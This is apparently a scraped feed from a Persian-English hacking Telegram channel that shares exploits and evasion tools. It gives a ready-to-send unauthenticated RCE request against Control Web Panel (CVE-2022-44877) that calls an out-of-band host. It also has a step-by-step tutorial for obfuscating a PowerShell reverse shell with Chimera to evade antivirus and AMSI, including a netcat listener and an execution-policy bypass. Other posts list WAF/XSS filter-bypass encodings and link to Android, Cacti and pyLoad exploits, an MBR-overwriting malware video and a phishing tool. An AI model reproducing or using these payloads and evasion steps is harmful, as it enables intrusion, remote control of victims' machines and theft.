FilelessNtdllReflection ( Bypass Userland EDR )
Github
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-44877
Control Web Panel Unauth RCE
usage :
——————
0Day.Today
@LearnExploit
@Tech_Army
Control Web Panel Unauth RCE
usage :
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1#RCE #CVE
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
——————
0Day.Today
@LearnExploit
@Tech_Army
👍11🔥2
C/C++ Memory Hacking -- OverWrite MBR
https://youtu.be/2Gfmw_6sYz4
#Malware #MBR #Virus
——————
0Day.Today
@LearnExploit
@Tech_Army
https://youtu.be/2Gfmw_6sYz4
#Malware #MBR #Virus
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-20452 ( privilege escalation on Android from installed app to system app (or another app)
Github
#android #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#android #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - michalbednarski/LeakValue: Exploit for CVE-2022-20452, privilege escalation on Android from installed app to system app…
Exploit for CVE-2022-20452, privilege escalation on Android from installed app to system app (or another app) via LazyValue using Parcel after recycle() - michalbednarski/LeakValue
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
[ Tags ]
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script
➖➖➖➖➖➖➖➖
آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )
➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script
➖➖➖➖➖➖➖➖
آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )
➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡7
0Day.Today | Learn Exploit | Zero World | Dark web |
[ Tags ] #Malware #Bypass #AMSI #AntiVirus #Chimera #Script ➖➖➖➖➖➖➖➖ آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها ) ➖➖➖➖➖➖➖➖ IR0Day.Today Bax @LearnExploit @Tech_Army
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
1. نصب پیش نیاز ها :
1. ساخت Payload :
1.2 تغییر ایپی :
پورت دیفالت اسکریپت 444 هستش :
1. ایجاد Listener در لینوکس با NetCat :
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
@LearnExploit
@Tech_Army
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()✅ نحوه ی نصب در Linux :
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
➖➖➖➖➖➖➖➖
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
2. کلون کردن ریپو :sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) : sudo chown root:root -R /opt/chimera/
4. تغییر مسیر به opt/chimera/ :cd /opt/chimera/
5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :sudo chmod +x chimera.sh
6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :./chimera.sh —help
➖➖➖➖➖➖➖➖✅ نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps12. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖✅ گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :powershell.exe -ep bypass C:\<PATH>\Payload.ps1
و تمام.امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
➖➖➖➖➖➖➖➖IR0Day.Today Bax
@LearnExploit
@Tech_Army
GitHub
nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
⚡6👍3❤🔥2
Forwarded from Bypass Network | رفع فیلترینگ
درود بکس
اگر مشکل کندی سرعت داری...
امروز میخوام در مورد LoadBalance باهاتون صحبت کنم .
در حالت عادی 99 درصد بچه هایی که دارن VPN می سازن و میفروشن بعد از مدتی از مشکل کندی شاکی میشن... ، تو چنین شرایطی ایپی شما دیتکت شده و میزان ترافیک ورودی به سرور شما محدود شده! یعنی اومدن IN-BOUND سرورتون رو کاهش دادن و حتی در بعضی مواقع عملا IN-BOUND شما در حد کیلو بایته و شما حتی نمیتونین SSH بزنین و ...
تو چنین شرایطی باید ایپی سرورتون رو تغییر بدید حالا پرووایدر های مختلفی واسه تغییر ایپی سیاست متفاوتی رو دارن بعضیا رایگان و بعضیا پولی .
خب LoadBlancing تو چنین شرایطی چه کمکی به ما میکنه ؟
ببینید بچه ها شما فرض کنید یک سرور با سه ایپی زیر دارید :
1.1.1.1
1.1.1.2
1.1.1.3
در حالت عادی کاربرای شما برای اتصال به پروتکل vpn شما از یک ای پی استفاده میکنه یعنی شما 30 تا یوزر روی سرورتون دارید و برای هر 10 تا یوزر یه ایپی تعریف کردید به صورت زیر
1.1.1.1 >> Top 10 User
1.1.1.2 >> Second 10 User
1.1.1.3 >> Third 10 User
تو چنین شرایطی سرور شما زودتر دیتکت میشه و ترافیک ورودیش کاهش پیدا میکنه حالا LoadBalance میاد چیکار میکنه شما بجای اینکه بیایی یوزراتو جدا کنی و برای هر کودوم ای پی جدا بدی واسه ی همه ی یوزرا امکان استفاده از تمام ای پی ها رو امکان پذیر میکنی اینجاست که مفهوم LoadBalancing پررنگ میشه.
به زبون خیلی ساده 30 تا یوزر روی سرورت میتونه به هر 3 تا ایپی سرورت متصل بشه و از همون پروتکل استفاده کنه.
نحوه ی استفاده از LoadBalancing رایگان رو توی پست بعدی انشاالله بهتون میگم
فعلا اگه سوالی داشتید توی گپ بپرسید تا پست رو آماده کنم.
Author : X P 4
➖➖➖➖➖➖
channel : @BypassNetwork
اگر مشکل کندی سرعت داری...
امروز میخوام در مورد LoadBalance باهاتون صحبت کنم .
در حالت عادی 99 درصد بچه هایی که دارن VPN می سازن و میفروشن بعد از مدتی از مشکل کندی شاکی میشن... ، تو چنین شرایطی ایپی شما دیتکت شده و میزان ترافیک ورودی به سرور شما محدود شده! یعنی اومدن IN-BOUND سرورتون رو کاهش دادن و حتی در بعضی مواقع عملا IN-BOUND شما در حد کیلو بایته و شما حتی نمیتونین SSH بزنین و ...
تو چنین شرایطی باید ایپی سرورتون رو تغییر بدید حالا پرووایدر های مختلفی واسه تغییر ایپی سیاست متفاوتی رو دارن بعضیا رایگان و بعضیا پولی .
خب LoadBlancing تو چنین شرایطی چه کمکی به ما میکنه ؟
ببینید بچه ها شما فرض کنید یک سرور با سه ایپی زیر دارید :
1.1.1.1
1.1.1.2
1.1.1.3
در حالت عادی کاربرای شما برای اتصال به پروتکل vpn شما از یک ای پی استفاده میکنه یعنی شما 30 تا یوزر روی سرورتون دارید و برای هر 10 تا یوزر یه ایپی تعریف کردید به صورت زیر
1.1.1.1 >> Top 10 User
1.1.1.2 >> Second 10 User
1.1.1.3 >> Third 10 User
تو چنین شرایطی سرور شما زودتر دیتکت میشه و ترافیک ورودیش کاهش پیدا میکنه حالا LoadBalance میاد چیکار میکنه شما بجای اینکه بیایی یوزراتو جدا کنی و برای هر کودوم ای پی جدا بدی واسه ی همه ی یوزرا امکان استفاده از تمام ای پی ها رو امکان پذیر میکنی اینجاست که مفهوم LoadBalancing پررنگ میشه.
به زبون خیلی ساده 30 تا یوزر روی سرورت میتونه به هر 3 تا ایپی سرورت متصل بشه و از همون پروتکل استفاده کنه.
نحوه ی استفاده از LoadBalancing رایگان رو توی پست بعدی انشاالله بهتون میگم
فعلا اگه سوالی داشتید توی گپ بپرسید تا پست رو آماده کنم.
Author : X P 4
➖➖➖➖➖➖
channel : @BypassNetwork
Telegram
AttachLearnExploit
👍12👏1
This media is not supported in your browser
VIEW IN TELEGRAM
GitHub has a built-in VSCode.
Just change .com to .dev on your repo:
#Git #Github
——————
0Day.Today
@LearnExploit
@Tech_Army
Just change .com to .dev on your repo:
#Git #Github
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
Exploit to CVE-2022-46169 vulnerability on Cacti 1.2.19
Github
#exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9
XSS/WAF/SQL filter bypass.
#bypass #xss #waf #sql
——————
0Day.Today
@LearnExploit
@Tech_Army
< - %EF%BC%9C (\uff1c)
> - %EF%BC%9E (\uff1e)
\ - %EF%BC%BC (\uff3c)
/ - %EF%BC%8F (\uff0f)
' - %EF%BC%87 (\uff07)
" - %EF%BC%82 (\uff02)
#bypass #xss #waf #sql
——————
0Day.Today
@LearnExploit
@Tech_Army
👍13🍾2
👍1
terminalGPT
Get GPT like chatGPT on your terminal
Github
#chatgpt #terminal
——————
0Day.Today
@LearnExploit
@Tech_Army
Get GPT like chatGPT on your terminal
Github
#chatgpt #terminal
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍2
Frack - Keep and Maintain your breach data
Github
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
thanks to Idar Lund
#breach #tools ——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - sensepost/Frack: Frack - Keep and Maintain your breach data
Frack - Keep and Maintain your breach data. Contribute to sensepost/Frack development by creating an account on GitHub.
CVE-2023-0297 ( The Story of Finding Pre-auth RCE in pyLoad )
Github
#CVE #RCE #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #RCE #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
Exploiting null-dereferences in the Linux kernel
Github
#linux #kernel #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#linux #kernel #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Blogspot
Exploiting null-dereferences in the Linux kernel
Posted by Seth Jenkins, Project Zero For a fair amount of time , null-deref bugs were a highly exploitable kernel bug class. Back when...
آموزش ابزار Rubikphish روی کالی لینوکس
Github
#phishing #kali #linux #tools
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#phishing #kali #linux #tools
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army